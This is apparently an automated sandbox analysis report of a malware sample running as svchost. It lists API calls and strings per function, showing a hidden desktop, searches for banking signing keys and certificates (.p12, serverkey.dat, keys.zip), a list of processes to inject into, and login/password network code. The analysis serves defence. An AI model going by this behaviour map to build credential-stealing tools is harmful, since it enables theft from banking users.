GetWindow.USER32(00000000,00000005), ref: 02D2D2E7
GetWindow.USER32(00000000), ref: 02D2D2EA
GetWindowInfo.USER32(00000000,?), ref: 02D2D2FE
GetWindowRect.USER32(?,?), ref: 02D2D363
SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02D2D38D
GetClientRect.USER32(?,?), ref: 02D2D399
MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02D2D3B5
CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02D2D3DA
SetWindowLongA.USER32(00000000,000000F4,?), ref: 02D2D3EC
GetClassLongA.USER32(00000000,000000E6), ref: 02D2D3F5
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2D404
GetWindowTextLengthA.USER32(00000000), ref: 02D2D40B
HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02D2D41F
SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02D2D443
SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02D2D450
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2D460
GetClassLongA.USER32(00000000,000000DE), ref: 02D2D47C
GetClassLongA.USER32(00000000,000000F2), ref: 02D2D485
LoadIconA.USER32(00000000,00007F00), ref: 02D2D491
SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02D2D4AB
GetWindowLongA.USER32(00000000,000000F0), ref: 02D2D4D4
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D2D4E3
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D4F6
GetWindow.USER32(00000000,00000003), ref: 02D2D519
IsIconic.USER32(?), ref: 02D2D537
ShowWindow.USER32(?,00000001), ref: 02D2D544
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2D553
ReleaseMutex.KERNEL32(00000000), ref: 02D2D56B

Part of subcall function 02D2D0E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2D0EC
Part of subcall function 02D2D0E0: GetCurrentThreadId.KERNEL32 ref: 02D2D0F4
Part of subcall function 02D2D0E0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D2D100
Part of subcall function 02D2D0E0: SendMessageA.USER32(?,0000000D,?,?), ref: 02D2D111
Part of subcall function 02D2D0E0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D2D11D

PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02D2D578
GetDlgItem.USER32(?,?), ref: 02D2D5E7
GetWindowLongA.USER32(00000000), ref: 02D2D5EE
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2D5FE
ReleaseMutex.KERNEL32(00000000), ref: 02D2D618
GetDlgItem.USER32(?,00000000), ref: 02D2D62D
GetWindowLongA.USER32(00000000,000000EB), ref: 02D2D63C
DeleteObject.GDI32(?), ref: 02D2D648
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D2D657
DestroyWindow.USER32(00000000), ref: 02D2D65E
EndDialog.USER32(?,00000000), ref: 02D2D673

Strings

static, xrefs: 02D2D3D3
<, xrefs: 02D2D2F6
', xrefs: 02D2D500

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
String ID: '$<$static
API String ID: 2592195760-1233416523
Opcode ID: 5fe902083bbb86ca7b571771a3e599c44a875f86cc9422d0e9b87d7e1021eb59
Instruction ID: 22c2663aa4536b03cba7db4ffd83fe99ea6b5a319c3a35aeca6e4b414b181652
Opcode Fuzzy Hash: 5fe902083bbb86ca7b571771a3e599c44a875f86cc9422d0e9b87d7e1021eb59
Instruction Fuzzy Hash: 28E1B072984210AFD3208F68FC8CF6A37A9EB99726F504A08F555E63C0D774AC95CB71

Function 02D29360 Relevance: 80.8, APIs: 41, Strings: 5, Instructions: 320sleepprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02D44B30: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D44B60
Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D44B79
Part of subcall function 02D44B30: HeapAlloc.KERNEL32(00000000), ref: 02D44B7C
Part of subcall function 02D44B30: memset.MSVCRT ref: 02D44B90
Part of subcall function 02D44B30: RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D44BB0
Part of subcall function 02D44B30: RegCloseKey.ADVAPI32(?), ref: 02D44BC0
Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BD1
Part of subcall function 02D44B30: HeapValidate.KERNEL32(00000000), ref: 02D44BD4
Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BE1
Part of subcall function 02D44B30: HeapFree.KERNEL32(00000000), ref: 02D44BE4

CreateDesktopA.USER32 ref: 02D293BF
SetThreadDesktop.USER32(00000000), ref: 02D293DA
memset.MSVCRT ref: 02D293E8
SHGetFolderPathA.SHELL32 ref: 02D29420
PathAppendA.SHLWAPI(?,00000000), ref: 02D29442
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 02D29461
GetShellWindow.USER32 ref: 02D2946D
Sleep.KERNEL32(0000000A), ref: 02D29482
GetShellWindow.USER32 ref: 02D29484
GetHandleInformation.KERNEL32(?,000000FF), ref: 02D294B1
CloseHandle.KERNEL32(?), ref: 02D294C3
GetHandleInformation.KERNEL32(00000000,000000FF), ref: 02D294DD
CloseHandle.KERNEL32(00000000), ref: 02D294EF
GetDesktopWindow.USER32 ref: 02D294F5
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02D29506
SetThreadDesktop.USER32(?), ref: 02D2959E
memset.MSVCRT ref: 02D295AF
SHGetFolderPathA.SHELL32 ref: 02D295ED
PathAppendA.SHLWAPI(?,00000000), ref: 02D2960F
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02D29631
GetShellWindow.USER32 ref: 02D2963D
Sleep.KERNEL32(0000000A), ref: 02D29652
GetShellWindow.USER32 ref: 02D29654
GetHandleInformation.KERNEL32(?,00000024), ref: 02D29683
CloseHandle.KERNEL32(?), ref: 02D29691
GetHandleInformation.KERNEL32(?,00000024), ref: 02D296AB
CloseHandle.KERNEL32(?), ref: 02D296B9
GetDesktopWindow.USER32 ref: 02D296BF

Strings

explorer.exe, xrefs: 02D29434, 02D29439, 02D29601, 02D29606
D, xrefs: 02D29410
D, xrefs: 02D295D7
Shell_TrayWnd, xrefs: 02D294FC, 02D296C6
a1633b6ba, xrefs: 02D293AA, 02D29418, 02D2950C, 02D295E2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Window$Heap$CloseDesktopProcess$InformationPathShell$Creatememset$AppendFolderSleepThread$AllocFindFreeOpenQueryValidateValue
String ID: D$D$Shell_TrayWnd$a1633b6ba$explorer.exe
API String ID: 3365957849-948391127
Opcode ID: e303108a0626af89000fb9d36f595464a3f4d4194c507256212427529b327d2b
Instruction ID: bf2ca970ec038ed208cf767c7afe851fc96fcac4bc77f56fc32a69b1605773bd
Opcode Fuzzy Hash: e303108a0626af89000fb9d36f595464a3f4d4194c507256212427529b327d2b
Instruction Fuzzy Hash: BCB1ADB2944351AFD710DF64E898AAB7BE8FB88258F544D2EF589C3300E7748C59CB61

Function 02D427C0 Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 376COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D427DE
memset.MSVCRT ref: 02D427F8
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D42822
PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42847
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D42887
GetLastError.KERNEL32 ref: 02D42891
IsUserAnAdmin.SHELL32 ref: 02D42899
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D428AA
SetLastError.KERNEL32(00000000), ref: 02D428B1
GetFileAttributesA.KERNEL32(00000000), ref: 02D428F4
SetCurrentDirectoryA.KERNEL32(00000000), ref: 02D42940
PathAddBackslashA.SHLWAPI(5E8DC473,00000000,00000000), ref: 02D42987

Strings

path_client.txt, xrefs: 02D429CB
keys.zip, xrefs: 02D42B18
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D42C09
\SIGN1\, xrefs: 02D42A9B
\, xrefs: 02D42919
path_keys.txt, xrefs: 02D42BBB
client.zip, xrefs: 02D428C8
5E8DC473, xrefs: 02D42842, 02D4284D, 02D42982, 02D4298D, 02D42AC2, 02D42ACD, 02D42B72, 02D42B7D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
API String ID: 1576442920-192137239
Opcode ID: 19541674ed55cd52fedf631e1237f51a466fd5e589a18d1c1d209e581154b8f1
Instruction ID: af30682b0e001808c4d6dc18ede8c223b60cb0585a36e460c196ae4ab79d9262
Opcode Fuzzy Hash: 19541674ed55cd52fedf631e1237f51a466fd5e589a18d1c1d209e581154b8f1
Instruction Fuzzy Hash: DED1F1309042559FDB258F24A86CBEA7BE5EF45300F588595ECCAD7341EF719E88CBA0

Function 02D43B90 Relevance: 56.4, APIs: 24, Strings: 8, Instructions: 364sleepCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,02D6A918), ref: 02D43BA8
Sleep.KERNEL32(000003E8), ref: 02D43BB9
FindWindowW.USER32(00000000,02D6A918), ref: 02D43BC2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D43BD6
StrStrIA.SHLWAPI(?,core.exe), ref: 02D43BEE
PathFileExistsA.SHLWAPI(?), ref: 02D43C19
StrStrIA.SHLWAPI(?,\data\id.dbf), ref: 02D43C4F
PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43C77
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43CB5
GetLastError.KERNEL32 ref: 02D43CBF
IsUserAnAdmin.SHELL32 ref: 02D43CC7
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43CD8
SetLastError.KERNEL32(00000000), ref: 02D43CDF

Strings

\data\id.dbf, xrefs: 02D43C43
keys.zip, xrefs: 02D43F1B
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D43FEC
keys%i.zip, xrefs: 02D43DC7
path%i.txt, xrefs: 02D43E69
data\id.dbf, xrefs: 02D43BF8
path.txt, xrefs: 02D43FAD
core.exe, xrefs: 02D43BE2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorFileFindLastWindow$AdminBackslashCreateDirectoryExistsFolderMakeModuleNameSleepSystemUser
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$\data\id.dbf$core.exe$data\id.dbf$keys%i.zip$keys.zip$path%i.txt$path.txt
API String ID: 109093349-643081521
Opcode ID: 7a1b9444166e7dc3cd5831b0b7fd98d92eb28ba83dbabd150f62c259eea445c4
Instruction ID: 2e5bd6d031b1091f94c64e935af3395fa4daf0ec3b845115af545a2a6894e604
Opcode Fuzzy Hash: 7a1b9444166e7dc3cd5831b0b7fd98d92eb28ba83dbabd150f62c259eea445c4
Instruction Fuzzy Hash: DBC1FC3190064A5FDB168F3C98687EA7BE5AF49300F6449E5E885D7340EF71DD48CB60

Function 02D3E1B0 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 346fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D3E1CF
memset.MSVCRT ref: 02D3E1F1
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3E206
SetErrorMode.KERNEL32(00000001), ref: 02D3E21F
GetDriveTypeA.KERNEL32(?), ref: 02D3E268
SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E27B
FindFirstFileA.KERNEL32(?,?), ref: 02D3E2DD
SetErrorMode.KERNEL32(?), ref: 02D3E5F3

Strings

keys, xrefs: 02D3E3D9
*.00*, xrefs: 02D3E2BA
path, xrefs: 02D3E4DE
.zip, xrefs: 02D3E428
asus, xrefs: 02D3E331
5E8DC03F, xrefs: 02D3E35F, 02D3E36A, 02D3E464, 02D3E46F
.txt, xrefs: 02D3E528
found., xrefs: 02D3E316

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
String ID: *.00*$.txt$.zip$5E8DC03F$asus$found.$keys$path
API String ID: 989413159-4189423734
Opcode ID: 2b4080cc6cc7a2ee94818337d6e3cbe709400ef61ff98591185bd45c84b8f01d
Instruction ID: 6928cf9adcca0b5f9f544cba0007dde1fd174cc2d416ae932a563c86ef9e79e1
Opcode Fuzzy Hash: 2b4080cc6cc7a2ee94818337d6e3cbe709400ef61ff98591185bd45c84b8f01d
Instruction Fuzzy Hash: 4AC1C2315083459FC726CF24D468BABBBE5AF89304F548A5CE8C6D7380EB31D948C7A1

Function 02D2CBF0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 342windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 02D2CC4A
IsIconic.USER32(?), ref: 02D2CC55
GetWindowInfo.USER32(?,?), ref: 02D2CCB2
GetAncestor.USER32(?,00000003,?,75C0BCB0,75BF3EB0), ref: 02D2CCD7
GetWindow.USER32(?,00000003), ref: 02D2CD50
IsWindow.USER32(?), ref: 02D2CD78
IsIconic.USER32(?), ref: 02D2CD83
memset.MSVCRT ref: 02D2CDB2
GetWindow.USER32(?,00000005), ref: 02D2CDD6
GetWindow.USER32(00000000), ref: 02D2CDD9

Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46

Strings

<, xrefs: 02D2CEA9
<, xrefs: 02D2CFC3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Iconic$AncestorClassInfoNamememset
String ID: <$<
API String ID: 3351429209-213342407
Opcode ID: 87c8694f373e03c02a471c488c68e4438a3c3c7a6556627d5d185dd251543315
Instruction ID: 7c484f48de8dd97d6a170c5cea48647488d5da1fe3216d64d7c9563c9ddfdec5
Opcode Fuzzy Hash: 87c8694f373e03c02a471c488c68e4438a3c3c7a6556627d5d185dd251543315
Instruction Fuzzy Hash: BCD1D270D102289FDB20DFA4DC88BAEBBB9EF54718F15415AE405A3380DB709D89CFA0

Function 02D21170 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D2118E
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF570), ref: 02D211AD
StrStrIA.SHLWAPI(00000000,java), ref: 02D211C5
StrStrIA.SHLWAPI(00000000,.exe), ref: 02D211DB
StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02D211FF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21221
GetProcessHeap.KERNEL32(00000008,?), ref: 02D2123E
HeapAlloc.KERNEL32(00000000), ref: 02D21245
memset.MSVCRT ref: 02D21255
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21271
CreateThread.KERNEL32(00000000,00000000,02D3AFC0,00000000,00000000,00000000), ref: 02D21285
StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02D212A4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D212D5
GetProcessHeap.KERNEL32(00000008,?), ref: 02D212F2
HeapAlloc.KERNEL32(00000000), ref: 02D212F9
memset.MSVCRT ref: 02D21309
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21325
CreateThread.KERNEL32(00000000,00000000,02D3E630,00000000,00000000,00000000), ref: 02D21339
CreateThread.KERNEL32(00000000,00000000,02D3FCA0,00000000,00000000,00000000), ref: 02D21376

Part of subcall function 02D3AF10: PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3AF37
Part of subcall function 02D3AF10: PathFileExistsA.SHLWAPI(?), ref: 02D3AFA0

GetHandleInformation.KERNEL32(00000000,?), ref: 02D2138E
CloseHandle.KERNEL32(00000000), ref: 02D2139F

Strings

serverkey.dat, xrefs: 02D2129E
.p12, xrefs: 02D211F9
.exe, xrefs: 02D211CF
java, xrefs: 02D211B9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
String ID: .exe$.p12$java$serverkey.dat
API String ID: 183229269-3502489836
Opcode ID: 19bf520fcc83ee62a0caf1359eecfbbe7ff8efe4293ee52ad83f62aecb105e7e
Instruction ID: d37e129924de61e4d55e1f4cbb8252f642473187aa58b7fcb2b7a1011d6fcdab
Opcode Fuzzy Hash: 19bf520fcc83ee62a0caf1359eecfbbe7ff8efe4293ee52ad83f62aecb105e7e
Instruction Fuzzy Hash: BB51D571E852357AEB305A619C4DFAB3B5C9F11B58F248244FD48A93C1EB60DC88CAF0

Function 02D398E0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 02D3994E
ExitThread.KERNEL32 ref: 02D3995E
socket.WS2_32(00000002,00000001,00000006), ref: 02D3996A
ExitThread.KERNEL32 ref: 02D3997D

Strings

pass, xrefs: 02D39914
login, xrefs: 02D398F3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ExitThread$Startupsocket
String ID: login$pass
API String ID: 1705285421-2248183487
Opcode ID: c3fffaab4f0ba5d945c29e13f82c012b47a21e114c7e119977174eaabb4d35e3
Instruction ID: 0c4e0dbb0e297a9e5e9c3dc4f6a5ba94eb75de16f4b6ac478fe3d3e30dca141b
Opcode Fuzzy Hash: c3fffaab4f0ba5d945c29e13f82c012b47a21e114c7e119977174eaabb4d35e3
Instruction Fuzzy Hash: B2517D35948301AFD300DF64E89CBAA7BE5BB89721F544A0DFAA5873C0D7B09D54CB62

Function 02D3C900 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 248COMMON

Download Yara Rule

APIs

Part of subcall function 02D44800: memset.MSVCRT ref: 02D44824
Part of subcall function 02D44800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75B07390,?), ref: 02D3C92C
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D3C94B
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C95D
CloseHandle.KERNEL32(00000000), ref: 02D3C96E
PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C997
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C9D1
GetLastError.KERNEL32 ref: 02D3C9DB
IsUserAnAdmin.SHELL32 ref: 02D3C9E3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C9F4
SetLastError.KERNEL32(00000000), ref: 02D3C9FB
GetFileAttributesA.KERNEL32(?), ref: 02D3CA31
SetCurrentDirectoryA.KERNEL32(?), ref: 02D3CA70
PathAddBackslashA.SHLWAPI(5E8DC08D,?,?), ref: 02D3CAB7
PathAddBackslashA.SHLWAPI(5E8DC08D,ctunnel.exe,?,75B07390,?), ref: 02D3CB97
PathFileExistsA.SHLWAPI(?), ref: 02D3CBF9

Strings

5E8DC08D, xrefs: 02D3C992, 02D3C999, 02D3CAB2, 02D3CAB9, 02D3CB92, 02D3CB99
path_ctunnel.txt, xrefs: 02D3CAF8
ctunnel.zip, xrefs: 02D3CA10
\, xrefs: 02D3CA4F
pass.log, xrefs: 02D3CBD8
ctunnel.exe, xrefs: 02D3C90C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
String ID: 5E8DC08D$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
API String ID: 3886636124-2971231654
Opcode ID: 51489b30db698f0c69d9886b2d87298ba0da72792e21beb4191f54656f7364f9
Instruction ID: abe152e78f598055446066dfc4225feee43dd8c29969750ccf83553edc35f86c
Opcode Fuzzy Hash: 51489b30db698f0c69d9886b2d87298ba0da72792e21beb4191f54656f7364f9
Instruction Fuzzy Hash: 9B91E5319182499FDB12CB24E86CBE67BE5EF45700F2485D5D8CAE7301EB719D88CBA0

Function 02D237E0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D237FE
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D23814
GetModuleHandleA.KERNEL32(kernel32.dll,76EEC3F0), ref: 02D23837
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D23849
GetCurrentProcess.KERNEL32(00000000), ref: 02D23855
IsUserAnAdmin.SHELL32 ref: 02D23864
StrStrIA.SHLWAPI(00000000,\svchost.exe), ref: 02D2387A
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D23894
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D238A0
GetCurrentProcess.KERNEL32(00000000), ref: 02D238AC
IsUserAnAdmin.SHELL32 ref: 02D238C1
PathFindFileNameA.SHLWAPI(00000000), ref: 02D238CE
StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,00000000), ref: 02D238DA
IsUserAnAdmin.SHELL32 ref: 02D238E4
StrStrIA.SHLWAPI(00000000,\winlogon.exe), ref: 02D238F6
IsUserAnAdmin.SHELL32 ref: 02D23900
StrStrIA.SHLWAPI(00000000,\explorer.exe), ref: 02D23912

Strings

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02D238D5
\winlogon.exe, xrefs: 02D238EA
\explorer.exe, xrefs: 02D23906
kernel32.dll, xrefs: 02D2382B, 02D23888
IsWow64Process, xrefs: 02D23843, 02D2389A
\svchost.exe, xrefs: 02D2386E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AdminUser$Module$AddressCurrentFileHandleNameProcProcess$FindPathmemset
String ID: IsWow64Process$\explorer.exe$\svchost.exe$\winlogon.exe$iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex$kernel32.dll
API String ID: 1410231462-2095515203
Opcode ID: daed96b4dcaa453106a9a171935c40ed3eb4e75b8543d5c70027193a5e401ef2
Instruction ID: 522e57e6d3b65e4be1304d58002781ec62e45745319f79a70bc177b1bc2bd956
Opcode Fuzzy Hash: daed96b4dcaa453106a9a171935c40ed3eb4e75b8543d5c70027193a5e401ef2
Instruction Fuzzy Hash: 70319C71E40325A7F7609BB1AD0CBA9776C5F24B09F440495E945E6340DBB8DD9CCB70

Function 02D2CE19 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 171windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02D2CE28
memset.MSVCRT ref: 02D2CE6B
GetWindowRect.USER32(00000000,00000000), ref: 02D2CE7B
GetWindowLongA.USER32(00000000,000000F0), ref: 02D2CE95
GetScrollBarInfo.USER32(00000000,000000FA,?,?,75C0BCB0,75BF3EB0), ref: 02D2CEB0
GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2CEDD
GetWindow.USER32(00000000,00000005), ref: 02D2CF15
GetWindow.USER32(00000000), ref: 02D2CF18
IsIconic.USER32(00000000), ref: 02D2CE37

Part of subcall function 02D2C780: IsWindow.USER32(00000000), ref: 02D2C79D
Part of subcall function 02D2C780: IsWindowVisible.USER32(00000000), ref: 02D2C7AC
Part of subcall function 02D2C780: GetWindowRect.USER32(00000000,?), ref: 02D2C7E9
Part of subcall function 02D2C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D2C7F2
Part of subcall function 02D2C780: PrintWindow.USER32(00000000,?,00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C805
Part of subcall function 02D2C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C82B
